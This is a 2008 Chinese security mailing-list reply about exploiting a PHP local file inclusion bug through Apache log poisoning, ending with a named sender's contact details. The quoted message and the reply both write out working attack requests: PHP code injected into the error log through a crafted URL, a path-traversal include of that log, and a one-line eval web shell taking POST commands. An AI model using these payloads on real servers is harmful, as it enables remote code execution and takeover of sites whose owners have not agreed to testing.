[Ph4nt0m] Re: 关于php本地包含漏洞包含apa che日志的利用

pengtao Thu, 16 Oct 2008 22:04:52 -0700

唐不狐，您好！ 

　　写个一句话马在日志里面看看能不能利用


http://target.com/fuc <?eval($_POST[c]);?>php
http://target.com/fuc.php?url=../../../usr/local/apache/logs/target.com-error_log
======== 2008-10-17 11:39:48 您在来信中写道： ========

测试环境 unix+php+mysql+apache
1 http://target.com/fuc <?phpinfo();? >.php
2 
http://target.com/fuc.php?url=../../../usr/local/apache/logs/target.com-error_log

成功看到phpinfo信息，代码被执行。

接下来
3 http://target.com/fuc <?system("ls+-la+/home");? >.php
4 
http://target.com/fuc.php?url=../../../usr/local/apache/logs/target.com-error_log
失败，并没有列出/home 目录，没有权限？

5 http://target.com/fuc <?system("ls+-la+/home/www/target_com");? >.php
还是无所获

请教，关于包含apache日志利用的细节，哪些应该注意的？能否成功的条件
谢谢！


= = = = = = = = = = = = = = = = = = = = = = 
　　　　　　　　致
礼！
===================================================
姓    名：彭涛 
部    门：网络安全监控中心M2S
职    位: 安全审计专家
E-mail  [EMAIL PROTECTED]
联系方式：010-62119678-419/13683161808
公    司：北京启明星辰信息技术有限公司
地    址：北京市海淀区中关村南大街12号188#
网    址:www.venustech.com.cn
邮政编码：100081
日期：2008-10-17
===================================================        

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件，请发到 [email protected]
 要退订此邮件，请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

[Ph4nt0m] Re: 关于php本地包含漏洞包含apa che日志的利用

回复